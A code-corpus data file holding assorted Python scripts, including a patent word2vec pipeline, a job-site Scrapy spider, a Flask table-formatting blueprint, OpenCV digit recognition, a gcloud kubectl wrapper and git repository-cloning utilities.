sqlite3.connect('kep.sqlite')\nc = conn.cursor()\n\n# Insert a row of data\nc.execute(\"INSERT OR REPLACE INTO annual VALUES (?, ?, ?)\", ('153', 1000, 0))\n\nc.executescript(\"\"\"\nDELETE FROM \"main\".\"quarterly\";\nDELETE FROM \"main\".\"monthly\";\nDELETE FROM \"main\".\"annual\";\n\"\"\")\n\n# Save (commit) the changes\nconn.commit()\n\n# We can also close the connection if we are done with it.\n# Just be sure any changes have been committed or they will be lost.\n\n\n\n\nimport sqlite3\n\ndef wipe_db_tables():\n conn = sqlite3.connect('kep.sqlite')\n c = conn.cursor()\n c.executescript(\"\"\"\n DELETE FROM \"main\".\"quarterly\";\n DELETE FROM \"main\".\"monthly\";\n DELETE FROM \"main\".\"annual\";\n \"\"\")\n conn.commit()\n conn.close()","sub_path":"src/abandoned/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"451759151","text":"#!/bin/env python2.7\n\"\"\"\nrun_w2v_pipeline.py\n\nA script for running all of the analysis in the Word2Vec/Kmeans\npipeline and saving results to a given directory path.\nThis may also be used as an example if you wish to do it by hand.\n\nEstimated running time for the whole dataset is on the order of 8 hours\nas of March 2015\n\"\"\"\nimport os\nthis_dir, _ = os.path.split(__file__)\nimport sys\nsys.path.append('/'.join(['../../', this_dir])) # Add the previous directory to the path (just a clooj for now)\nimport logging\nimport datetime\nimport numpy as np\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) #Set up logging\nfrom pymongo import MongoClient\nfrom pprint import pprint, pformat\nfrom sklearn.externals import joblib\n\nfrom jmAlife.txtMine import * # get my utility files. Automatically loads stoplist into the namespace. 
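# util.get_w2v / util.get_d2v below are project helpers whose bodies are not
# in this file. Judging from the pre-1.0 gensim attributes used later
# (model.syn0, model.index2word), a rough stand-in for get_w2v would be:
#
#     from gensim.models import Word2Vec
#     model = Word2Vec(sentences, size=vec_size, workers=1)
#     word_vecs = model.syn0                      # one row per vocab word
#     word2index = {w: i for i, w in enumerate(model.index2word)}
#
# (a sketch only; the helper's real signature is inferred from its call
# sites). The rows of syn0 line up with index2word, which is what the
# word2index mapping built in main() relies on.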
\n\n## GLOBAL VARIABLES\nc = MongoClient()\n\ndef main(coll, num_pats, model_type, vec_size, num_clusters, phrase_size, dest_dir):\n # Local Vars\n start = datetime.datetime.now()\n USE_GENERATORS = False\n \n\n # Get the appropriate patent cursor\n pats = c.patents.pat_text.find()\n if coll == \"patns\":\n pats = c.patents.patns.find()\n elif coll == \"pat_text\":\n pass\n else: \n sys.exit(\"%s collection not currently supported.\" %coll)\n\n TOTAL_PATS = pats.count()\n N = TOTAL_PATS\n\n # If input number of pats appropriate, take that number from the cursor.\n \"\"\"\n if num_pats < N and num_pats > 0:\n N = num_pats\n if N > 500000:\n USE_GENERATORS = True\n \"\"\"\n\n if model_type != \"d2v\" and model_type != \"w2v\":\n sys.exit(\"This model not currently supported. Enter 'W2V' for word2vec and 'D2V' for doc2vec\")\n\n logging.info(\"Running your %s/cluster job with vec_size %d and %d clusters. Preprocessing %d patents from %s with %d-grams\" \n %(model_type, vec_size, num_clusters, N, coll, phrase_size))\n \n if N != TOTAL_PATS:\n pats = util.take(N, pats)\n\n # Get gensim objects\n logging.info(\"Getting %d sentences...\" %N)\n ls = util.quick_labeled_sentences(list(pats), stoplist, False, phrase_size)\n logging.info(\"Length of labeled sentences is {}\".format(len(ls)))\n \n logging.info(\"Fitting %s model on %d patents...\" %(model_type, N))\n if model_type == \"d2v\":\n # Run d2v analysis and get word vectors\n model = util.get_d2v(ls, vec_size = vec_size, workers = 1)\n word_vecs, doc_vecs, indices = util.partition(model)\n word2index, doc2index = indices\n elif model_type == \"w2v\":\n # run w2v analysis and get word_vectors\n sentences = map(lambda x: x.words, ls)\n logging.info(\"In line before word2vec is fit, sentences has length {}\".format(len(sentences)))\n model = util.get_w2v(sentences, vec_size, workers = 1)\n word_vecs = model.syn0\n word2index = {word: index for (index, word) in enumerate(model.index2word)}\n else:\n raise RuntimeError(\"Internal Error. Invalid model_type %s\" %model_type)\n \n # Get Filenames\n model_ext = '.word2vec'\n if model_type == 'd2v':\n model_ext = '.doc2vec'\n model_fn = '/'.join([dest_dir, ''.join([model_type,str(vec_size),model_ext])])\n kmeans_fn = '/'.join([dest_dir, ''.join(['kmeans', str(num_clusters), '.pkl'])])\n cluster_parse_fn = '/'.join([dest_dir, 'parsed_clusters.npy'])\n\n logging.info(\"Saving Model to disk in %s\" %dest_dir)\n model.save(model_fn)\n\n # run cluster analysis\n logging.info(\"Getting %d clusters for %d words...\" %(num_clusters, len(word_vecs)))\n kmeans = util.get_kmeans(word_vecs, K = num_clusters)\n parsed_clusters = util.parse_clusters(kmeans, model)\n logging.info(\"Parsed Clusters: %s\" %pformat(parsed_clusters))\n\n # TODO - Get document representations and save them to disk too. \n\n # save to disk\n logging.info(\"Saving Kmeans to disk in %s\" %dest_dir)\n joblib.dump(kmeans, kmeans_fn)\n np.save(cluster_parse_fn, parsed_clusters)\n\n end = datetime.datetime.now()\n logging.info(\"Done. 
Time elapsed: %s\"%util.strfdelta(end - start, \"{days}d,{hours}h,{minutes}m,{seconds}s\"))\n\nif __name__ == \"__main__\":\n # Handle Command Line Args\n if len(sys.argv) != 8:\n sys.exit(\"Usage: python %s <'W2V' or 'D2V'> \" %sys.argv[0])\n coll = sys.argv[1]\n num_patents = int(sys.argv[2])\n model_type = sys.argv[3].lower()\n vec_size = int(sys.argv[4])\n num_clusters = int(sys.argv[5])\n phrase_size = int(sys.argv[6])\n destination_dir = sys.argv[7]\n main(coll, num_patents, model_type, vec_size, num_clusters, phrase_size, destination_dir)\n\n","sub_path":"scripts/txtMine_scripts/run_w2v_pipeline.py","file_name":"run_w2v_pipeline.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"173583651","text":"from scrapy.linkextractors import LinkExtractor\nfrom scrapy.spider import CrawlSpider, Rule\nfrom .mytools import Mytools\nfrom ..items import LagouJobItemLoader, LagouJobItem\nimport datetime\n\n\nclass LagouSpider(CrawlSpider):\n name = 'lagou'\n allowed_domains = ['www.lagou.com']\n start_urls = ['http://www.lagou.com/']\n\n rules = (\n Rule(LinkExtractor(allow=r\"zhaopin/.*\"), follow=True),\n Rule(LinkExtractor(allow=r\"gongsi/j\\d+.html\"), follow=True),\n Rule(LinkExtractor(allow=r'jobs/\\d+.html'), callback='parse_job', follow=True)\n )\n\n\n custom_settings = {\n 'COOKIES_ENABLED': False,\n \"DOWNLOAD_DELAY\": 0.5,\n 'DEFAULT_REQUEST_HEADERS': {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n 'Connection': 'keep-alive',\n 'DNT': '1',\n 'Host': 'www.lagou.com',\n 'Upgrade-Insecure-Requests': '1',\n 'Cookie': 'JSESSIONID=ABAAABAAADEAAFIBCD44E138F7B16FC70E4AA46B109801F; _ga=GA1.2.948320197.1534851127; user_trace_token=20180821193209-d7564b6c-a535-11e8-ab1f-5254005c3644; LGUID=20180821193209-d7564f40-a535-11e8-ab1f-5254005c3644; index_location_city=%E6%88%90%E9%83%BD; _gid=GA1.2.180925300.1536590785; TG-TRACK-CODE=hpage_code; X_HTTP_TOKEN=c935a49c0e8f02628c7ea7eb3acdadce; SEARCH_ID=b370a10d410d4b99bcb384ae52c15057; Hm_lvt_4233e74dff0ae5bd0a3d81c6ccf756e6=1534851129,1535022796,1536594353; Hm_lpvt_4233e74dff0ae5bd0a3d81c6ccf756e6=1536594353; LGRID=20180910234553-9989d7fa-b510-11e8-8d59-525400f775ce'\n },\n 'DOWNLOADER_MIDDLEWARES': {\n # user-agent代理\n 'ArticleSpider.middlewares.RandomUserAgentMiddleware': 2,\n # ip代理\n # 'ArticleSpider.middlewares.RandomIpProxyMiddleware': 3,\n # 'ArticleSpider.middlewares.JSPageMiddleware': 3,\n }\n }\n\n def parse_job(self, response):\n date = datetime.datetime.now().date()\n item_loader = LagouJobItemLoader(item=LagouJobItem(), response=response)\n item_loader.add_xpath('title', '//*[@class=\"job-name\"]/@title')\n item_loader.add_value('url', response.url)\n item_loader.add_value('url_object_id', Mytools.get_md5(response.url))\n item_loader.add_xpath('salary', '//*[@class=\"job_request\"]/p/span[1]/text()')\n item_loader.add_xpath('job_city', '//*[@class=\"job_request\"]/p/span[2]/text()')\n item_loader.add_xpath('work_years', '//*[@class=\"job_request\"]/p/span[3]/text()')\n item_loader.add_xpath('degree_need', '//*[@class=\"job_request\"]/p/span[4]/text()')\n item_loader.add_xpath('job_type', '//*[@class=\"job_request\"]/p/span[5]/text()')\n item_loader.add_xpath('publish_time', '//*[@class=\"publish_time\"]/text()')\n item_loader.add_xpath('job_advantage', 
'//*[@class=\"job-advantage\"]/p/text()')\n item_loader.add_xpath('job_addr', '//*[@class=\"work_addr\"]/a/text()')\n item_loader.add_xpath('company_url', '//*[@id=\"job_company\"]/dt/a/@href')\n item_loader.add_xpath('company_name', '//*[@id=\"job_company\"]/dt/a/img/@alt')\n item_loader.add_xpath('tags', '//*[contains(@class,\"position-label\")]/li/text()')\n item_loader.add_value('crawl_time', date)\n item_loader.add_xpath('job_desc', '//*[@class=\"job_bt\"]/div/p/text()')\n # item_loader.add_value('crawl_update_time', date)\n job_item = item_loader.load_item()\n\n return job_item\n","sub_path":"ArticleSpider/spiders/lagou.py","file_name":"lagou.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"576238321","text":"\"\"\"\nThe tables Blueprint handles the page views for each database table.\nSpecifically, it provides an html table to visualize the information.\nIt also allows users to add to, and edit the information.\n\"\"\"\nfrom flask import Blueprint\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nimport re\n\ntables_bp = Blueprint('tables', __name__, url_prefix='/tables',\n template_folder='templates')\n\n@tables_bp.app_template_filter()\ndef titleize(text):\n # replace underscores with spaces and titlecase the words\n return text.replace(\"_\", \" \").title()\n\n@tables_bp.app_template_filter()\ndef data_format(data, column):\n # convert money data stored as cents to dollars\n if column in ['price', 'total']:\n return \"${:,.2f}\".format((data/100))\n elif 'age' in column:\n years = data.years\n months = data.months\n days = data.days\n return \"{} years, {} months, {} days\".format(years, months, days)\n elif 'date' in column or column in ['arrived', 'finished', 'filled', 'emptied']:\n data = data.strftime(\"%m/%d/%Y\")\n elif column in ['proof_gal', 'pg_remaining']:\n return \"{:.2f}\".format((data/100))\n elif column == 'table':\n return titleize(data)\n elif column == 'product':\n if re.search(r'\\dl$', data):\n data = data[:-1]\n return \"{}L\".format(data)\n else:\n return data\n elif column == \"mash_number\":\n return data.upper()\n return data\n\nfrom . 
import routes\n","sub_path":"app/tables/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"84817751","text":"import cv2 \nimport numpy as np\nfrom keras.models import load_model\n\nimg_color = cv2.imread('./data/pred/pred.jpg', cv2.IMREAD_COLOR) \nimg_gray = cv2.cvtColor( img_color, cv2.COLOR_BGR2GRAY) \n\n\nret, img_binary = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU ) \n\nkernel = cv2.getStructuringElement( cv2.MORPH_RECT, (5, 5)) \nimg_binary = cv2.morphologyEx(img_binary, cv2.MORPH_CLOSE, kernel)\n'''\ncv2.imshow('digit', img_binary)\ncv2.waitKey(0) \n'''\ncontours, hierarchy = cv2.findContours(img_binary, cv2.RETR_EXTERNAL, \n cv2.CHAIN_APPROX_SIMPLE)\n\ncv2.drawContours(img_color, contours, -1, (0, 255, 0), 1) # -1 = 모든 컨투어 그림/ 1 = 선의 두께\n\n\nfor contour in contours:\n\n x, y, w, h = cv2.boundingRect(contour) \n\n length = max(w, h) + 60 \n img_digit = np.zeros((length, length, 1), np.uint8) \n \n\n new_x, new_y = x - (length - w)//2, y-(length - h)//2 \n\n img_digit = img_binary[new_y : new_y + length, new_x:new_x + length] \n\n kernel = np.ones((5, 5), np.uint8) \n img_digit = cv2.morphologyEx(img_digit, cv2.MORPH_DILATE, kernel) \n\n cv2.imshow('digit', img_digit)\n cv2.waitKey(0) \n\n model = load_model('./mini_project/graph/model1.h5') \n\n img_digit = cv2.resize(img_digit, (256, 256), interpolation = cv2.INTER_LINEAR)\n \n\n img_digit = cv2.cvtColor( img_digit, cv2.COLOR_GRAY2BGR)\n\n img_digit = img_digit /255.0 \n\n img_input = img_digit.reshape(1, 256, 256, 3) \n predictions = model.predict(img_input) \n\n number = np.argmax(predictions) \n print(number)\n\n cv2.rectangle(img_color, (x, y), (x+w, y+h), (255, 255, 0), 2) \n\n location = (x + int(w *0.5), y -10) \n font = cv2.FONT_HERSHEY_COMPLEX\n fontScale = 1.2\n cv2.putText(img_color, str(number), location, font, fontScale, (0, 255, 0), 2)\n\n cv2.imshow('digit', img_digit) \n cv2.waitKey(0)\n\n# for문 빠져나옴\n\ncv2.imshow('result', img_color) \ncv2.waitKey(0)","sub_path":"project/project01_ingred_recipe/opencv01_contour2.py","file_name":"opencv01_contour2.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"588358091","text":"def can_partition(nums):\n def helper(nums, dp, sum, index):\n if sum == 0:\n return 1\n n = len(nums)\n if n == 0 or index >= n:\n return 0\n if dp[index][sum] == -1:\n if nums[index] <= sum:\n if helper(nums, dp, sum - nums[index], index + 1) == 1:\n dp[index][sum] = 1\n return 1\n dp[index][sum] = helper(nums, dp, sum, index + 1)\n return dp[index][sum]\n s= sum(nums)\n dp = [[-1 for _ in range((s/2)+1)] for _ in range(len(nums))]\n print(dp)\n if sum(nums) % 2 != 0:\n return False\n return True if helper(nums, dp, int(sum(nums) / 2), 0) == 1 else False\n","sub_path":"src/01knapsack_pattern/equal_subset_sum_partition/top_down.py","file_name":"top_down.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"619682479","text":"# Copyright 2014 Google Inc. 
All Rights Reserved.\n\n\"\"\"Passthrough command for calling kubectl from gcloud.\"\"\"\nimport argparse\n\nfrom googlecloudsdk.calliope import actions\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.calliope import exceptions\nfrom googlecloudsdk.container.lib import kubeconfig as kconfig\nfrom googlecloudsdk.container.lib import util\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\nfrom googlecloudsdk.core.util import platforms\nfrom googlecloudsdk.core.util.compat26 import subprocess\n\n\nKUBECTL_TIMEOUT_ERR = 'connection timed out'\nKUBECTL_TLS_ERR = 'certificate signed by unknown authority'\n\n\ndef WhichKubectl():\n try:\n return subprocess.check_output(['which', 'kubectl'])\n except subprocess.CalledProcessError:\n return None\n\n\nDEPRECATION_WARNING = '''\\\nThis command is deprecated. Use kubectl directly with the cluster.\n{use_context}\nkubectl {args}\n'''\n\n\nclass Kubectl(base.Command):\n \"\"\"Pass-through command to call kubectl with arbitrary arguments.\n\n See https://cloud.google.com/container-engine/docs/kubectl for\n kubectl documentation.\n \"\"\"\n\n @staticmethod\n def Args(parser):\n \"\"\"Register flags for this command.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order\n to capture some information, but behaves like an ArgumentParser.\n \"\"\"\n parser.add_argument(\n '--purge-config-cache',\n help='Clear cached config data for the cluster. If set, will call '\n '\\'container clusters describe\\' directly to get cluster data before '\n 'executing kubernetes client command.',\n action='store_true')\n parser.add_argument(\n '--cluster', '-n',\n help='The name of the cluster to issue commands to.',\n action=actions.StoreProperty(properties.VALUES.container.cluster))\n parser.add_argument(\n 'kubectl_args',\n nargs=argparse.REMAINDER,\n help='Arbitrary arguments to pass to kubectl')\n\n def LoadClusterConfig(self, args):\n \"\"\"Load and return ClusterConfig prior to calling a kubectl command.\n\n Args:\n args: an argparse namespace. 
All the arguments that were provided to this\n command invocation.\n\n Returns:\n ClusterConfig for the project,zone,cluster specified by args/properties.\n\n Raises:\n util.Error: if container API reports cluster is not running.\n \"\"\"\n name = properties.VALUES.container.cluster.Get(required=True)\n cluster_ref = util.ParseCluster(name, self.context)\n\n c_config = util.ClusterConfig.Load(\n cluster_ref.clusterId, cluster_ref.zoneId, cluster_ref.projectId)\n if args.purge_config_cache:\n util.ClusterConfig.Purge(\n cluster_ref.clusterId, cluster_ref.zoneId, cluster_ref.projectId)\n c_config = None\n\n if not c_config or not c_config.has_certs:\n log.status.Print('Fetching cluster endpoint and auth data.')\n # Call DescribeCluster to get auth info and cache for next time\n cluster = util.DescribeCluster(cluster_ref, self.context)\n messages = self.context['container_messages']\n if cluster.status != messages.Cluster.StatusValueValuesEnum.running:\n raise util.Error('cluster %s is not running' % cluster_ref.clusterId)\n c_config = util.ClusterConfig.Persist(\n cluster, cluster_ref.projectId, self.cli)\n return c_config\n\n def CallKubectl(self, c_config, kubectl_args):\n \"\"\"Shell out to call to kubectl tool.\n\n Args:\n c_config: ClusterConfig object for cluster.\n kubectl_args: specific args to call kubectl with (not including args\n for authentication).\n Returns:\n (output, error), where\n output: str, raw output of the kubectl command.\n error: subprocess.CalledProcessError, if the command exited with\n non-zero status, None if command exited with success.\n \"\"\"\n base_args = [\n '--kubeconfig=%s' % kconfig.Kubeconfig.DefaultPath(),\n '--context=%s' % c_config.kube_context,\n ]\n if not c_config.has_certs:\n log.warn('No certificate files found in %s. Certificate checking '\n 'disabled for calls to cluster master.', c_config.config_dir)\n args = ['kubectl'] + base_args + kubectl_args\n try:\n log.debug('Calling \\'%s\\'', repr(args))\n output = subprocess.check_output(args, stderr=subprocess.STDOUT)\n return (output, None)\n except subprocess.CalledProcessError as error:\n return (error.output, error)\n\n @exceptions.RaiseToolExceptionInsteadOf(util.Error)\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command.\n\n Args:\n args: an argparse namespace. All the arguments that were provided to this\n command invocation.\n\n Returns:\n (output, error), where\n output: str, raw output of the kubectl command.\n error: subprocess.CalledProcessError, if the command exited with\n non-zero status, None if command exited with success.\n\n Raises:\n util.Error: if the current platform is not supported by kubectl.\n \"\"\"\n local = platforms.Platform.Current()\n if local.operating_system == platforms.OperatingSystem.WINDOWS:\n raise util.Error(\n 'This command requires the kubernetes client (kubectl), which is '\n 'not available for Windows at this time.')\n if not WhichKubectl():\n raise util.Error(\n 'This command requires the kubernetes client (kubectl), which is '\n 'installed with the default gcloud components. 
Run '\n '\\'gcloud components update\\', or make sure kubectl is '\n 'installed somewhere on your path.')\n\n cluster_config = self.LoadClusterConfig(args)\n # Print deprecation warning, including command to switch context, if needed\n kubeconfig = kconfig.Kubeconfig.Default()\n use_context = ''\n if kubeconfig.current_context != cluster_config.kube_context:\n use_context = '\\nkubectl config use-context '+cluster_config.kube_context\n log.warn(DEPRECATION_WARNING.format(\n use_context=use_context, args=' '.join(args.kubectl_args)))\n\n output, error = self.CallKubectl(cluster_config, args.kubectl_args)\n # If error looks like stale config, try refetching cluster config\n if error and (KUBECTL_TLS_ERR in output or\n KUBECTL_TIMEOUT_ERR in output):\n log.warn(\n 'Command failed with error: %s. Purging config cache and retrying'\n % error.output)\n args.purge_config_cache = True\n cluster_config = self.LoadClusterConfig(args)\n output, error = self.CallKubectl(cluster_config, args.kubectl_args)\n return output, error\n\n def Display(self, args, result):\n \"\"\"This method is called to print the result of the CallKubectl method.\n\n Args:\n args: The arguments that command was run with.\n result: The value returned from the CallKubectl method.\n \"\"\"\n output, error = result\n if error:\n log.debug('kubectl command %s returned non-zero exit status %d',\n error.cmd, error.returncode)\n log.error(output)\n self.exit_code = error.returncode\n else:\n log.out.Print(output)\n\nKubectl.detailed_help = {\n 'brief': 'Call kubectl with arbitrary arguments.',\n 'DESCRIPTION': \"\"\"\\\n Passes given arguments to kubectl along with arguments\n to set the cluster context (overwriting yourself is not recommended).\n Requires the compute/zone and container/cluster properties\n be defined. If they are missing, the command will fail with an error\n message that describes how to set the missing property.\n\n WARNING: this command is deprecated! You can run kubectl directly\n after calling\n\n $ gcloud alpha container get-credentials\n\n You can then use\n\n $ kubectl config use-context {context}\n\n to switch between clusters.\n \"\"\".format(\n context=util.ClusterConfig.KUBECONTEXT_FORMAT.format(\n project='PROJECT', zone='ZONE', cluster='CLUSTER'))\n}\n\n","sub_path":"sdk/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/container/commands/kubectl.py","file_name":"kubectl.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"356646704","text":"# _*_ coding: utf_8 _*_\n# search score \nimport logging\nimport os,openpyxl,pprint,re\n\nlogging.basicConfig( level = logging.DEBUG, format = ' %(asctime)s - %(levelname)s - %(message)s' )\n\nreg = r'\\d{7}[zZ]?' 
# reg = '1510401' \nclassRegex = re.compile(reg)\n\nlogging.info('classRegex is:%s', classRegex)\n\nfiles = ['模拟电路课程设计-1510401z.xlsx','认识实习1520603-外教.xlsx','电路与电子技术(核工)-1510401.xlsx']\n\nfor file in files:\n logging.info(file)\n a = re.findall(classRegex,file) # a = classRegex.search(file)\n if(a):\n logging.info('class that is found is:'+ str(a))\n print(file)\n \n","sub_path":"re_test1.py","file_name":"re_test1.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"140704409","text":"import pandas as pd\nfrom scipy import stats\n\n\ndef rna_protein_correlation(feature_count_table, feature_count_start_column, feature_count_end_column, protein_table,\n protein_count_start_column, protein_count_end_column,\n output_file):\n sequencing_table = pd.read_table(feature_count_table)\n protein_table = pd.read_table(protein_table)\n sequencing_table.set_index('Gene', inplace=True)\n protein_table.set_index('Protein.IDs', inplace=True)\n value_matrix_sequencing = _extract_value_matrix(sequencing_table, feature_count_start_column,\n feature_count_end_column)\n value_matrix_protein = _extract_value_matrix(protein_table, protein_count_start_column, protein_count_end_column)\n correlation(value_matrix_sequencing, value_matrix_protein, output_file)\n\n\ndef _extract_value_matrix(feature_count_table_df, feature_count_start_column, feature_count_end_column):\n return feature_count_table_df.iloc[:, int(feature_count_start_column):int(feature_count_end_column)]\n\n\ndef correlation(value_matrix_sequencing, value_matrix_protein, output_file):\n correlation_dataframe = pd.DataFrame(0, columns=value_matrix_sequencing.index, index=value_matrix_protein.index)\n # i = 0\n for index_gene, row_gene in value_matrix_sequencing.iterrows():\n # i = i + 1\n # print(str(i) + \": \" + index_gene)\n # if i == 2:\n # break\n for index_protein, row_protein in value_matrix_protein.iterrows():\n rho = stats.spearmanr(row_gene, row_protein)[0]\n correlation_dataframe.loc[index_protein, index_gene] = rho\n # print(correlation_dataframe.loc[index_protein, index_gene])\n\n correlation_dataframe.to_csv(output_file, sep='\\t')\n","sub_path":"graditudelib/correlation_rna_protein.py","file_name":"correlation_rna_protein.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"235986298","text":"from gensim.models import word2vec\nimport gensim\nimport os\nimport logging\nimport jieba\nimport jieba.analyse\n\n\n# 此函数作用是对初始语料进行分词处理后,作为训练模型的语料\ndef cut_txt(old_file):\n cut_file = old_file + '_cut.txt'\n\n try:\n fi = open(old_file, 'r', encoding='utf-8')\n except BaseException as e: # 因BaseException是所有错误的基类,用它可以获得所有错误类型\n print(Exception, \":\", e) # 追踪错误详细信息\n\n text = fi.read() # 获取文本内容\n new_text = jieba.cut(text, cut_all=False) # 精确模式\n str_out = (\n ' '.join(new_text)\n .replace(',', '')\n .replace('。', '')\n .replace('?', '')\n .replace('!', '')\n .replace('“', '')\n .replace('”', '')\n .replace(':', '')\n .replace('…', '')\n .replace('(', '')\n .replace(')', '')\n .replace('—', '')\n .replace('《', '')\n .replace('》', '')\n .replace('、', '')\n .replace('‘', '')\n .replace('’', '')\n ) # 去掉标点符号\n fo = open(cut_file, 'w', encoding='utf-8')\n fo.write(str_out)\n\n\ndef model_train(\n train_file_name, save_model_file\n): # model_file_name为训练语料的路径,save_model为保存模型名\n # 模型训练,生成词向量\n logging.basicConfig(\n format='%(asctime)s : %(levelname)s : %(message)s', 
level=logging.INFO\n )\n sentences = word2vec.Text8Corpus(train_file_name) # 加载语料\n model = gensim.models.Word2Vec(sentences, size=200) # 训练skip-gram模型; 默认window=5\n model.save(save_model_file)\n model.wv.save_word2vec_format(\n save_model_file + \".bin\", binary=True\n ) # 以二进制类型保存模型以便重用\n\n\n# 训练\ndef train(save_model_name, cut_file):\n if not os.path.exists(save_model_name): # 判断文件是否存在\n model_train(cut_file, save_model_name)\n else:\n print('此训练模型已经存在,不用再次训练')\n\n\ndef test1(save_model_name, str1, str2):\n # 加载已训练好的模型\n model_1 = word2vec.Word2Vec.load(save_model_name)\n # 计算两个词的相似度/相关程度\n y1 = model_1.similarity(str1, str2)\n print(str1 + \"和\" + str2 + \"的相似度为:\", y1)\n print(\"-------------------------------\\n\")\n\n\ndef test2(save_model_name, str1):\n model_1 = word2vec.Word2Vec.load(save_model_name)\n # 计算某个词的相关词列表\n y2 = model_1.most_similar(str1, topn=10) # 10个最相关的\n print(u\"和\" + str1 + \"最相关的词有:\\n\")\n for item in y2:\n print(item[0], item[1])\n print(\"-------------------------------\\n\")\n\n return y2\n\n\ndef print_str(file, key_words):\n with open(file, 'r', encoding='utf-8') as opener:\n lines = opener.readlines()\n for key_word in key_words:\n print(\"\\n\" + \"\\n\" + \"\\n\")\n k_1 = key_word[0]\n print(k_1)\n for line in lines:\n if k_1 in line:\n print(line)\n\n\nif __name__ == '__main__':\n # cut_txt('JD_before.txt') # 须注意文件必须先另存为utf-8编码格式\n # train('JD_before.model','JD_before.txt_cut.txt')\n # test1('JD_before.model',\"京东\",\"品牌\")\n val = input(\"输入:\")\n # 关键词\n key_words = test2('JD_before.model', val)\n print_str('JD.txt', key_words)\n","sub_path":"jieba分词/word2vec_demo.py","file_name":"word2vec_demo.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"562165817","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 24 15:39:01 2018\n\n@author: suvod\n\"\"\"\n\nfrom pygit2 import clone_repository\nfrom pygit2 import GIT_SORT_TOPOLOGICAL, GIT_SORT_REVERSE,GIT_MERGE_ANALYSIS_UP_TO_DATE,GIT_MERGE_ANALYSIS_FASTFORWARD,GIT_MERGE_ANALYSIS_NORMAL,GIT_RESET_HARD\nfrom pygit2 import Repository\nimport shutil,os\nimport pygit2\nimport re\nfrom main.utils.utils import utils\nfrom os import listdir\nfrom os.path import isfile, join\nfrom datetime import datetime\nimport platform\nimport threading\nfrom multiprocessing import Queue\nfrom threading import Thread\nimport numpy as np\nimport itertools\nimport pandas as pd\nfrom multiprocessing import Pool, cpu_count\nfrom os.path import dirname as up\n\nclass ThreadWithReturnValue(Thread):\n def __init__(self, group=None, target=None, name=None,\n args=(), kwargs={}, Verbose=None):\n Thread.__init__(self, group, target, name, args, kwargs)\n self._return = None\n def run(self):\n #print(type(self._target))\n if self._target is not None:\n self._return = self._target(*self._args,\n **self._kwargs)\n def join(self, *args):\n Thread.join(self, *args)\n return self._return\n\nclass get_all_branches(object):\n \n def __init__(self,repo_url,repo_name):\n self.repo_url = repo_url\n self.repo_name = repo_name\n self.commit = []\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n self.repo_path = up(up(os.getcwd())) + '/temp_repo/' + repo_name\n else:\n self.repo_path = up(up(os.getcwd())) + '\\\\temp_repo\\\\' + repo_name\n self.clone_repo()\n \n \n def clone_repo(self):\n git_path = pygit2.discover_repository(self.repo_path)\n if git_path is not None:\n self.repo = pygit2.Repository(git_path)\n return 
self.repo\n if not os.path.exists(self.repo_path):\n os.makedirs(self.repo_path)\n self.repo = clone_repository(self.repo_url, self.repo_path)\n return self.repo\n \n \n def get_branches(self):\n return list(self.repo.branches)\n\nclass git2repo(object):\n \n def __init__(self,repo_url,repo_name):\n self.repo_url = repo_url\n self.repo_name = repo_name\n self.repos = []\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n self.repo_path = os.getcwd() + '/temp_repo/' + repo_name\n else:\n self.repo_path = os.getcwd() + '\\\\temp_repo\\\\' + repo_name\n self.cores = cpu_count()\n \n def clone_repo(self):\n git_path = pygit2.discover_repository(self.repo_path)\n if git_path is not None:\n self.repo = pygit2.Repository(git_path)\n return self.repo\n if not os.path.exists(self.repo_path):\n os.makedirs(self.repo_path)\n self.repo = clone_repository(self.repo_url, self.repo_path)\n return self.repo\n\n def clone_branch(self,branch):\n repo_path = self.repo_path + '_' + branch\n git_path = pygit2.discover_repository(repo_path)\n if git_path is not None:\n self.repo = pygit2.Repository(git_path)\n return self.repo\n if not os.path.exists(repo_path):\n os.makedirs(repo_path)\n self.repo = clone_repository(self.repo_url, repo_path,checkout_branch = branch)\n return self.repo\n\n def clone_master_branch(self):\n repo_path = self.repo_path\n git_path = pygit2.discover_repository(repo_path)\n if git_path is not None:\n self.repo = pygit2.Repository(git_path)\n return self.repo\n if not os.path.exists(repo_path):\n os.makedirs(repo_path)\n self.repo = clone_repository(self.repo_url, 